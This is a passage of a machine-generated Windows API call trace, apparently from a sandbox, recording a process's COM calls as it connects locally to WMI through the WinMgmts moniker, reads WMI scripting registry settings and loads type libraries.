Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ee90 | out: ppvObject=0x19ee90*=0x0) returned 0x80004002 [0149.370] IUnknown:QueryInterface (in: This=0x534da8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ecac | out: ppvObject=0x19ecac*=0x0) returned 0x80004002 [0149.370] IUnknown:QueryInterface (in: This=0x534da8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19ea84 | out: ppvObject=0x19ea84*=0x0) returned 0x80004002 [0149.370] IUnknown:AddRef (This=0x534da8) returned 0x3 [0149.370] IUnknown:QueryInterface (in: This=0x534da8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e7e4 | out: ppvObject=0x19e7e4*=0x0) returned 0x80004002 [0149.370] IUnknown:QueryInterface (in: This=0x534da8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e794 | out: ppvObject=0x19e794*=0x0) returned 0x80004002 [0149.370] IUnknown:QueryInterface (in: This=0x534da8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e7a0 | out: ppvObject=0x19e7a0*=0x0) returned 0x80004002 [0149.370] CoGetContextToken (in: pToken=0x19e800 | out: pToken=0x19e800) returned 0x0 [0149.371] CObjectContext::QueryInterface () returned 0x0 [0149.371] CObjectContext::GetCurrentApartmentType () returned 0x0 [0149.371] Release () returned 0x0 [0149.372] CoGetObjectContext (in: riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x54dba4 | out: ppv=0x54dba4*=0x524090) returned 0x0 [0149.408] CoGetContextToken (in: pToken=0x19ec08 | out: pToken=0x19ec08) returned 0x0 [0149.408] IUnknown:QueryInterface (in: This=0x534da8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec94 | out: ppvObject=0x19ec94*=0x0) returned 0x80004002 [0149.409] IUnknown:Release (This=0x534da8) returned 0x2 [0149.409] CoGetContextToken (in: pToken=0x19f1e8 | out: pToken=0x19f1e8) returned 0x0 [0149.427] CoGetContextToken (in: pToken=0x19f148 | out: pToken=0x19f148) returned 0x0 [0149.427] IUnknown:QueryInterface (in: This=0x534da8, riid=0x19f218*(Data1=0xe, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f214 | out: ppvObject=0x19f214*=0x534da8) returned 0x0 [0149.427] IUnknown:AddRef (This=0x534da8) returned 0x4 [0149.427] IUnknown:Release (This=0x534da8) returned 0x3 [0149.427] IUnknown:Release (This=0x534da8) returned 0x2 [0149.428] CoGetContextToken (in: pToken=0x19f268 | out: pToken=0x19f268) returned 0x0 [0149.428] IUnknown:AddRef (This=0x534da8) returned 0x3 [0149.428] MkParseDisplayName (in: pbc=0x534da8, szUserName="WinMgmts:", pchEaten=0x19f454, ppmk=0x19f40c | out: pchEaten=0x19f454, ppmk=0x19f40c*=0x54e340) returned 0x0 [0149.786] malloc (_Size=0x80) returned 0xa43128 [0149.804] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x54da50 [0149.805] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0149.805] DllGetClassObject (in: rclsid=0x579ca4*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x762c7590*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1f8 | out: ppv=0x19f1f8*=0x54da50) returned 0x0 [0149.805] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x54da50 [0149.806] WinMGMTS:IClassFactory:CreateInstance (in: This=0x54da50, pUnkOuter=0x0, riid=0x74dc6800*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1a0 | out: ppvObject=0x19f1a0*=0x54e768) returned 0x0 [0149.807] GetVersionExW (in: lpVersionInformation=0x19ef58*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x19efb8, dwMinorVersion=0x7673234f, dwBuildNumber=0xc0150008, dwPlatformId=0x0, szCSDVersion="\㟟≶) | out: lpVersionInformation=0x19ef58*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0149.807] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x19ef50 | out: phkResult=0x19ef50*=0x36c) returned 0x0 [0149.808] RegQueryValueExW (in: hKey=0x36c, lpValueName="Default Impersonation Level", lpReserved=0x0, lpType=0x0, lpData=0x19ef48, lpcbData=0x19ef54*=0x4 | out: lpType=0x0, lpData=0x19ef48*=0x3, lpcbData=0x19ef54*=0x4) returned 0x0 [0149.808] RegCloseKey (hKey=0x36c) returned 0x0 [0149.808] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x57aaa0 [0149.808] GetSystemDirectoryW (in: lpBuffer=0x57aaa0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0149.808] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x76600000 [0149.808] GetProcAddress (hModule=0x76600000, lpProcName="DuplicateTokenEx") returned 0x76620ad0 [0149.808] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0149.809] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x54e0e8 [0149.809] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x54e768 [0149.809] WinMGMTS:IUnknown:Release (This=0x54da50) returned 0x0 [0149.809] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0149.809] WinMGMTS:IParseDisplayName:ParseDisplayName (in: This=0x54e768, pbc=0x534da8, pszDisplayName="WinMgmts:", pchEaten=0x19f3b0, ppmkOut=0x19f3ac | out: pchEaten=0x19f3b0*=0x9, ppmkOut=0x19f3ac*=0x54e340) returned 0x0 [0149.810] ApiSetQueryApiSetPresence () returned 0x0 [0149.810] _wcsnicmp (_String1="WinMgmts:", _String2="WINMGMTS:", _MaxCount=0x9) returned 0 [0149.810] IBindCtx:GetObjectParam (in: This=0x534da8, pszKey=0x65ab3e5c, ppunk=0x19f258 | out: ppunk=0x19f258*=0x0) returned 0x80004005 [0149.810] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x4f3310 [0149.810] _wcsnicmp (_String1="", _String2="{", _MaxCount=0x1) returned -123 [0149.810] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x53dfb8 [0149.810] ResolveDelayLoadedAPI () returned 0x76330060 [0149.811] CoCreateInstance (in: rclsid=0x65ab1c58*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65ab1c48*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x53dfd0 | out: ppv=0x53dfd0*=0x54e838) returned 0x0 [0149.829] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x53e3c8 [0149.829] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x52d640 [0149.829] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x4f3530 [0149.829] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0149.829] GetCurrentThreadId () returned 0x1184 [0149.829] _wcsnicmp (_String1="", _String2="[", _MaxCount=0x1) returned -91 [0149.830] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0149.830] GetCurrentThreadId () returned 0x1184 [0149.831] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x19f0cc | out: phkResult=0x19f0cc*=0x374) returned 0x0 [0149.831] RegQueryValueExW (in: hKey=0x374, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x19f0d0*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x19f0d0*=0x16) returned 0x0 [0149.831] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x4f3430 [0149.831] RegQueryValueExW (in: hKey=0x374, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x4f3430, lpcbData=0x19f0d0*=0x16 | out: lpType=0x0, lpData=0x4f3430*=0x72, lpcbData=0x19f0d0*=0x16) returned 0x0 [0149.831] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x4ea958 [0149.833] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0149.833] RegCloseKey (hKey=0x374) returned 0x0 [0149.834] CoCreateInstance (in: rclsid=0x65ab21a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65ab21b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x19f104 | out: ppv=0x19f104*=0x532f70) returned 0x0 [0150.122] SysStringLen (param_1=".") returned 0x1 [0150.122] WbemDefPath:IWbemPath:SetServer (This=0x532f70, Name=".") returned 0x0 [0150.122] CoCreateInstance (in: rclsid=0x65ab21a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65ab21b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x19f0b0 | out: ppv=0x19f0b0*=0x53f650) returned 0x0 [0150.122] CoCreateInstance (in: rclsid=0x65ab21a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65ab21b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x19f04c | out: ppv=0x19f04c*=0x54f4e0) returned 0x0 [0150.122] WbemDefPath:IWbemPath:SetText (This=0x54f4e0, uMode=0x4, pszPath="root\\cimv2") returned 0x0 [0150.122] WbemDefPath:IUnknown:Release (This=0x54f4e0) returned 0x0 [0150.122] SysStringLen (param_1="root\\cimv2") returned 0xa [0150.122] WbemDefPath:IWbemPath:SetText (This=0x53f650, uMode=0xc, pszPath="root\\cimv2") returned 0x0 [0150.122] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53f650, puCount=0x19f0c8 | out: puCount=0x19f0c8*=0x2) returned 0x0 [0150.122] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x532f70) returned 0x0 [0150.122] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x53f650, uIndex=0x0, puNameBufLength=0x19f084*=0x0, pName=0x0 | out: puNameBufLength=0x19f084*=0x5, pName=0x0) returned 0x0 [0150.122] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x57b5a0 [0150.122] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x53f650, uIndex=0x0, puNameBufLength=0x19f084*=0x5, pName="䅬瘭䆐瘭㩸" | out: puNameBufLength=0x19f084*=0x5, pName="root") returned 0x0 [0150.122] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0150.122] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x532f70, uIndex=0x0, pszName="root") returned 0x0 [0150.123] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x53f650, uIndex=0x1, puNameBufLength=0x19f084*=0x0, pName=0x0 | out: puNameBufLength=0x19f084*=0x6, pName=0x0) returned 0x0 [0150.123] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x57b5b8 [0150.123] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x53f650, uIndex=0x1, puNameBufLength=0x19f084*=0x6, pName="" | out: puNameBufLength=0x19f084*=0x6, pName="cimv2") returned 0x0 [0150.123] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0150.123] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x532f70, uIndex=0x1, pszName="cimv2") returned 0x0 [0150.123] WbemDefPath:IUnknown:Release (This=0x53f650) returned 0x0 [0150.123] WbemDefPath:IWbemPath:GetText (in: This=0x532f70, lFlags=4, puBuffLength=0x19f0cc*=0x0, pszText=0x0 | out: puBuffLength=0x19f0cc*=0xf, pszText=0x0) returned 0x0 [0150.123] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x54ddc8 [0150.123] WbemDefPath:IWbemPath:GetText (in: This=0x532f70, lFlags=4, puBuffLength=0x19f0cc*=0xf, pszText="cimv2" | out: puBuffLength=0x19f0cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.123] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0150.123] WbemDefPath:IUnknown:Release (This=0x532f70) returned 0x0 [0150.123] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54e838, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x19f14c | out: ppNamespace=0x19f14c*=0x533928) returned 0x0 [0154.286] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x54f4e0 [0154.286] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x52d1c0 [0154.286] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x571f68 [0154.286] WbemLocator:IUnknown:QueryInterface (in: This=0x533928, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f13c | out: ppvObject=0x19f13c*=0x5472a4) returned 0x0 [0154.287] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5472a4, pProxy=0x533928, pAuthnSvc=0x19f118, pAuthzSvc=0x19f11c, pServerPrincName=0x0, pAuthnLevel=0x19f18c, pImpLevel=0x19f194, pAuthInfo=0x0, pCapabilites=0x19f120 | out: pAuthnSvc=0x19f118*=0xa, pAuthzSvc=0x19f11c*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19f18c*=0x6, pImpLevel=0x19f194*=0x2, pAuthInfo=0x0, pCapabilites=0x19f120*=0x1) returned 0x0 [0154.287] WbemLocator:IUnknown:Release (This=0x5472a4) returned 0x1 [0154.287] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0154.287] GetCurrentThreadId () returned 0x1184 [0154.287] WbemLocator:IUnknown:QueryInterface (in: This=0x533928, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1b4 | out: ppvObject=0x19f1b4*=0x5472a4) returned 0x0 [0154.287] WbemLocator:IClientSecurity:CopyProxy (in: This=0x5472a4, pProxy=0x533928, ppCopy=0x19f1d8 | out: ppCopy=0x19f1d8*=0x5339c8) returned 0x0 [0154.287] WbemLocator:IUnknown:QueryInterface (in: This=0x5339c8, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f050 | out: ppvObject=0x19f050*=0x5472a4) returned 0x0 [0154.287] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5472a4, pProxy=0x5339c8, pAuthnSvc=0x19f080, pAuthzSvc=0x19f07c, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x19f080*=0xa, pAuthzSvc=0x19f07c*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0154.287] WbemLocator:IUnknown:Release (This=0x5472a4) returned 0x3 [0154.287] WbemLocator:IUnknown:QueryInterface (in: This=0x5339c8, riid=0x65ab1f08*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f034 | out: ppvObject=0x19f034*=0x5472c8) returned 0x0 [0154.287] WbemLocator:IUnknown:QueryInterface (in: This=0x5339c8, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f038 | out: ppvObject=0x19f038*=0x5472a4) returned 0x0 [0154.288] WbemLocator:IClientSecurity:SetBlanket (This=0x5472a4, pProxy=0x5339c8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0154.288] WbemLocator:IUnknown:Release (This=0x5472a4) returned 0x4 [0154.288] WbemLocator:IUnknown:Release (This=0x5472c8) returned 0x3 [0154.288] WbemLocator:IUnknown:Release (This=0x5472a4) returned 0x2 [0154.288] WbemLocator:IUnknown:AddRef (This=0x5339c8) returned 0x3 [0154.288] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x52d2e0 [0154.288] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x580880 [0154.288] WbemLocator:IUnknown:Release (This=0x533928) returned 0x2 [0154.289] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0154.289] GetCurrentThreadId () returned 0x1184 [0154.289] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0154.289] GetCurrentThreadId () returned 0x1184 [0154.289] WbemLocator:IUnknown:QueryInterface (in: This=0x5339c8, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1dc | out: ppvObject=0x19f1dc*=0x5472a4) returned 0x0 [0154.289] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5472a4, pProxy=0x5339c8, pAuthnSvc=0x19f1c8, pAuthzSvc=0x19f1cc, pServerPrincName=0x0, pAuthnLevel=0x19f1d8, pImpLevel=0x19f1d4, pAuthInfo=0x0, pCapabilites=0x19f1d0 | out: pAuthnSvc=0x19f1c8*=0xa, pAuthzSvc=0x19f1cc*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19f1d8*=0x6, pImpLevel=0x19f1d4*=0x3, pAuthInfo=0x0, pCapabilites=0x19f1d0*=0x20) returned 0x0 [0154.289] WbemLocator:IUnknown:Release (This=0x5472a4) returned 0x2 [0154.289] ResolveDelayLoadedAPI () returned 0x74df2060 [0154.290] CreatePointerMoniker (in: punk=0x54f4e0, ppmk=0x19f3ac | out: ppmk=0x19f3ac*=0x54e340) returned 0x0 [0154.290] IUnknown:AddRef (This=0x54f4e0) returned 0x2 [0154.308] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0154.308] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0154.308] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0154.308] WbemLocator:IUnknown:Release (This=0x54e838) returned 0x0 [0154.308] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0154.308] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0154.311] WinMGMTS:IUnknown:Release (This=0x54e768) returned 0x0 [0154.311] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0154.316] IUnknown:QueryInterface (in: This=0x54e340, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eec8 | out: ppvObject=0x19eec8*=0x54e340) returned 0x0 [0154.316] IUnknown:QueryInterface (in: This=0x54e340, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ee84 | out: ppvObject=0x19ee84*=0x0) returned 0x80004002 [0154.316] IUnknown:QueryInterface (in: This=0x54e340, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eca4 | out: ppvObject=0x19eca4*=0x0) returned 0x80004002 [0154.316] IUnknown:QueryInterface (in: This=0x54e340, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19ea7c | out: ppvObject=0x19ea7c*=0x0) returned 0x80004002 [0154.317] IUnknown:AddRef (This=0x54e340) returned 0x3 [0154.317] IUnknown:QueryInterface (in: This=0x54e340, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e7dc | out: ppvObject=0x19e7dc*=0x0) returned 0x80004002 [0154.317] IUnknown:QueryInterface (in: This=0x54e340, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e78c | out: ppvObject=0x19e78c*=0x0) returned 0x80004002 [0154.317] IUnknown:QueryInterface (in: This=0x54e340, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e798 | out: ppvObject=0x19e798*=0x54e354) returned 0x0 [0154.317] IMarshal:GetUnmarshalClass (in: This=0x54e354, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e7a0 | out: pCid=0x19e7a0*(Data1=0x306, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0154.317] IUnknown:Release (This=0x54e354) returned 0x3 [0154.317] CoGetContextToken (in: pToken=0x19e7f8 | out: pToken=0x19e7f8) returned 0x0 [0154.318] CoGetContextToken (in: pToken=0x19ec00 | out: pToken=0x19ec00) returned 0x0 [0154.318] IUnknown:QueryInterface (in: This=0x54e340, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec8c | out: ppvObject=0x19ec8c*=0x0) returned 0x80004002 [0154.318] IUnknown:Release (This=0x54e340) returned 0x2 [0154.318] CoGetContextToken (in: pToken=0x19f1d8 | out: pToken=0x19f1d8) returned 0x0 [0154.318] CoGetContextToken (in: pToken=0x19f138 | out: pToken=0x19f138) returned 0x0 [0154.318] IUnknown:QueryInterface (in: This=0x54e340, riid=0x19f208*(Data1=0xf, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x54e340) returned 0x0 [0154.318] IUnknown:AddRef (This=0x54e340) returned 0x4 [0154.318] IUnknown:Release (This=0x54e340) returned 0x3 [0154.318] IUnknown:Release (This=0x534da8) returned 0x2 [0154.318] IUnknown:Release (This=0x54e340) returned 0x2 [0154.322] CoGetContextToken (in: pToken=0x19f270 | out: pToken=0x19f270) returned 0x0 [0154.322] IUnknown:AddRef (This=0x54e340) returned 0x3 [0154.322] BindMoniker (in: pmk=0x54e340, grfOpt=0x0, iidResult=0x22f2fc4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x19f410 | out: ppvResult=0x19f410*=0x54f4e0) returned 0x0 [0154.322] IUnknown:QueryInterface (in: This=0x54f4e0, riid=0x22f2fc4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f410 | out: ppvObject=0x19f410*=0x54f4e0) returned 0x0 [0154.323] LoadRegTypeLib (in: rguid=0x65ab2198*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x19ec64*=0x0 | out: pptlib=0x19ec64*=0x513458) returned 0x0 [0154.387] ITypeLib:GetTypeInfoOfGuid (in: This=0x513458, GUID=0x54f524*(Data1=0x62e522dc, Data2=0x8cf3, Data3=0x40a8, Data4=([0]=0x8b, [1]=0x2e, [2]=0x37, [3]=0xd5, [4]=0x95, [5]=0x65, [6]=0x1e, [7]=0x40)), ppTInfo=0x54f50c | out: ppTInfo=0x54f50c*=0x585934) returned 0x0 [0154.391] IUnknown:Release (This=0x513458) returned 0x1 [0154.391] IUnknown:AddRef (This=0x585934) returned 0x2 [0154.391] ITypeInfo:RemoteGetTypeAttr (in: This=0x585934, ppTypeAttr=0x19eca0, pDummy=0x3ff905e4 | 